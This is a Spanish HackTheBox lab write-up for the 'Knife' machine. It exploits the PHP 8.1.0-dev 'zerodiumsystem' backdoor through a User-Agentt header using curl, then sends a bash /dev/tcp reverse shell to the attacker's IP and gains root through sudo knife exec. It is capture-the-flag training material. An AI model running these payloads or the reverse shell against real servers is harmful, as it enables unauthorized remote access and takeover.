I"/<p>Knife es una máquina linux de nivel fácil, creada por <a href="https://app.hackthebox.eu/users/98767">MrKN16H7</a>, en la que vamos a explotar un bug de PHP para conseguir una RCE
y ejecutar un binario como root para convertirnos en él.</p>

<p><img src="https://user-images.githubusercontent.com/71317374/131216908-df335eaa-0496-43e5-bc76-2d77ec7be9f9.png" alt="imagen" /></p>

<p>Según los seres vivos que hay por HackTheBox, la máquina es así:</p>

<p><img src="https://user-images.githubusercontent.com/71317374/131216886-9c9c8b8e-6fef-4467-914f-d108e367b3d5.png" alt="imagen" /></p>

<p>Muy CTF(y es así)</p>

<p>1 - <a href="#recon">Reconocimiento inicial</a></p>

<p>2 - <a href="#deeprecon">Reconocimiento profundo</a></p>

<p>3 - <a href="#exploit">Explotación</a></p>

<p>4 - <a href="#privesc">Escalada de privilegios y flag</a></p>

<h1 id="recon">[Reconocimiento inicial]</h1>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Nmap 7.92 scan initiated Fri Aug 27 20:20:39 2021 as: nmap -p- --open --min-rate 3000 -sS -Pn -n -v 10.10.10.242 -oG ports -oN ports.nmap</span>
Nmap scan report <span class="k">for </span>10.10.10.242
Host is up <span class="o">(</span>0.30s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 51068 closed tcp ports <span class="o">(</span>reset<span class="o">)</span>, 14465 filtered tcp ports <span class="o">(</span>no-response<span class="o">)</span>
Some closed ports may be reported as filtered due to <span class="nt">--defeat-rst-ratelimit</span>
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Read data files from: /usr/bin/../share/nmap
<span class="c"># Nmap done at Fri Aug 27 20:21:14 2021 -- 1 IP address (1 host up) scanned in 34.80 seconds</span>
</code></pre></div></div>

<h2 id="pequeña-explicación-de-los-parámetros-de-nmap">Pequeña explicación de los parámetros de nmap</h2>
<ul>
  <li>-p-: Escanea todos los puertos.</li>
  <li>–open: Solo muestra los que están abiertos.</li>
  <li>–min-rate: Envía un mínimo de paquetes por segundo para que vaya más rápido, con un número muy alto, como 10000, puede dar falsos positivos o negativos.</li>
  <li>-sS: TCP SYN Port Scan, agiliza un poco el escaneo ya que no espera a que se complete el <a href="https://networksigma.com/tcp-3-way-handshake/">Three-Way Handshake</a>.</li>
  <li>-Pn: Deshabilita el descubrimiento de host mediante pings a la máquina para comprobar si está activa.</li>
  <li>-n: Deshabilita la resolución DNS</li>
  <li>-v: Muestra los puertos a medida que los descubre</li>
  <li>-oG: Guarda el escaneo de nmap en diferentes formatos, -oG lo guarda en formato grepeable, para luego usar la <a href="https://pastebin.com/tYpwpauW">función extractPorts de s4vitar</a></li>
  <li>-oN: Guarda el escaneo como aparece por consola.</li>
</ul>

<p>Los puertos abiertos son el 22, para obtener una shell segura(SSH), y 80, que hostea un servidor HTTP.</p>

<h1 id="deeprecon">[Reconocimiento profundo]</h1>

<p>Ahora que tenemos los puertos abiertos de la máquina, vamos a enumerarlos(de forma básica) y a detectar la versión y servicio que corren.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>❯ nmap <span class="nt">-sCV</span> <span class="nt">-p22</span>,80 10.10.10.242 <span class="nt">-oN</span> targeted
Starting Nmap 7.92 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2021-08-28 15:47 CEST
Nmap scan report <span class="k">for </span>10.10.10.242
Host is up <span class="o">(</span>0.049s latency<span class="o">)</span><span class="nb">.</span>

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey:
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 <span class="o">(</span>RSA<span class="o">)</span>
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 <span class="o">(</span>ED25519<span class="o">)</span>
80/tcp open  http    Apache httpd 2.4.41 <span class="o">((</span>Ubuntu<span class="o">))</span>
|_http-title:  Emergent Medical Idea
|_http-server-header: Apache/2.4.41 <span class="o">(</span>Ubuntu<span class="o">)</span>
Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span>
Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>8.69 seconds
</code></pre></div></div>

<h1 id="exploit">Explotación</h1>

<p>Si vamos a la página web, lo primero que encontramos es esto, un servidor Apache con PHP 8.1:</p>

<p><img src="https://user-images.githubusercontent.com/71317374/131220276-fec35a9e-4b46-4692-b37f-6d8bef6caf25.png" alt="imagen" /></p>

<p>Si buscamos exploits para la versión de Apache que corre no encontramos nada, en cambio, si buscamos exploits para la versión de PHP que corre, encontramos uno muy interesante que nos permite ejecutar código mediante la cabecera <code class="language-plaintext highlighter-rouge">User-Agentt: zerodiumsystem("[comando]");</code> en la petición.</p>

<blockquote>
  <p>An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.</p>
</blockquote>

<p><a href="https://flast101.github.io/php-8.1.0-dev-backdoor-rce/">https://flast101.github.io/php-8.1.0-dev-backdoor-rce/</a></p>

<p>Esto se puede hacer de tres formas: con un script automatizado para ello, con cURL mediante el parámetro -H o interceptando la petición con BurpSuite y añadiendo esta cabecera.</p>

<h2 id="explotación-con-curl">Explotación con cURL</h2>

<p>cURL tiene el parámetro -H, mediante el cual le puedes asignar más cabeceras a tu petición si son necesarias, entonces si le añadimos la cabecera <code class="language-plaintext highlighter-rouge">User-Agentt: zerodiumsystem("[comando]");</code> podríamos ejecutar comandos a nivel de sistema en la máquina. El comando sería así:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ❯ curl <span class="nt">-s</span> <span class="nt">-H</span> <span class="s1">'User-Agentt: zerodiumsystem("whoami");'</span> 10.10.10.242 | <span class="nb">grep</span> <span class="nt">-i</span> doctype <span class="nt">-B</span> 1 | <span class="nb">grep</span> <span class="nt">-v</span> <span class="nt">-i</span> doctype
</code></pre></div></div>
<p>Le he añadido grep para ver únicamente el resultado del comando, que se encuentra al principio del código de la página web.</p>

<h2 id="explotación-con-burpsuite">Explotación con BurpSuite</h2>

<p>Con BurpSuite hay que interceptar la petición hacia la página web, y modificarla con la misma cabecera de antes. Es recomendable pasar la petición al Repeater con Ctrl + R para poder modificarla como quieras y sin tener que recargar la página cada vez que vayas a ejecutar el comando.</p>

<h2 id="conseguir-una-reverse-shell">Conseguir una Reverse Shell</h2>

<p>Ahora solo habría que ejecutar la Reverse Shell de siempre, si no la sabes es:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code> bash <span class="nt">-c</span> <span class="s1">'bash -i &gt;&amp; /dev/tcp/tuip/puertoEnElQueTienesNC 0&gt;&amp;1'</span>
</code></pre></div></div>
<p>Y la petición quedaría así:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code> GET / HTTP/1.1
Host: 10.10.10.242
User-Agent: Mozilla/5.0 <span class="o">(</span>X11<span class="p">;</span> Linux x86_64<span class="p">;</span> rv:92.0<span class="o">)</span> Gecko/20100101 Firefox/92.0
User-Agentt: zerodiumsystem<span class="o">(</span><span class="s2">"bash -c 'bash -i &gt;&amp; /dev/tcp/10.10.14.49/443 0&gt;&amp;1'"</span><span class="o">)</span><span class="p">;</span>
Accept: text/html,application/xhtml+xml,application/xml<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,image/avif,image/webp,<span class="k">*</span>/<span class="k">*</span><span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8
Accept-Language: en-US,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.5
Accept-Encoding: <span class="nb">gzip</span>, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age<span class="o">=</span>0
</code></pre></div></div>

<p>Yyyyyy estamos dentrooooooo :D</p>

<p><img src="https://user-images.githubusercontent.com/71317374/131221770-5691e50a-7486-48ef-819f-9549fd457f4e.png" alt="imagen" /></p>

<h1 id="privesc">Flag y Privesc</h1>

<p>Ahora mismo, si por cualquier cosa hiciera Ctrl+C tendría que volver a enviarme la shell, cosa que nadie quiere, así que tendremos que hacer <a href="https://www.thehackersnow.com/tratamiento-de-una-tty/">tratamiento de la TTY</a></p>

<p>Vale, ahora que tenemos una consola interactiva en el sistema, podríamos ir a ver la User Flag, ubicada en /home/james/user.txt:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>james@knife:~<span class="nv">$ </span><span class="nb">cat </span>user.txt | <span class="nb">head</span> <span class="nt">-c</span> 15<span class="p">;</span><span class="nb">echo
</span>cf42b739b6d4f75
</code></pre></div></div>

<p>Ahora que tenemos taambién la flag, habría que centrarse en la escalada de privilegios, si hacemos <code class="language-plaintext highlighter-rouge">sudo -l</code> para ver si podemos ejecutar algún comando o binario como otro usuario, obtenemos:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>james@knife:~<span class="nv">$ </span><span class="nb">sudo</span> <span class="nt">-l</span>
Matching Defaults entries <span class="k">for </span>james on knife:
    env_reset, mail_badpass,
    <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/snap/bin

User james may run the following commands on knife:
    <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/bin/knife
</code></pre></div></div>

<p>Entonces podemos ejecutar <strong>knife</strong> como root, si buscamos en <a href="gtfobins.github.io">gtfobins</a> sobre este binario, vemos que es capaz de correr código Ruby, y que se puede usar para escalar privilegios.</p>

<blockquote>
  <p>Sudo</p>

  <p>If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain &gt;privileged access.</p>

  <p><code class="language-plaintext highlighter-rouge">sudo knife exec -E 'exec "/bin/sh"'</code></p>
</blockquote>

<p>Así que ejecutamos ese comando y…</p>

<p><img src="https://user-images.githubusercontent.com/71317374/131222071-b59c07d1-a759-4382-9576-569e603afcfe.png" alt="imagen" /></p>

<p>Yasta, somos root y podríamos irnos a /root a recoger nuestro premio por conseguir el root(valga la redundancia).</p>

<p>Ha sido una máquina en la que no ha habido que enumerar mucho, lo cual la hace más rápida. Me ha gustado como hay que ganar acceso a la máquina y la historia detrás del bug de PHP. Si te ha gustado puedes darme una estrellita al blog :)</p>

<p>Y recuerda, Metasploit siempre es la solución.</p>
:ET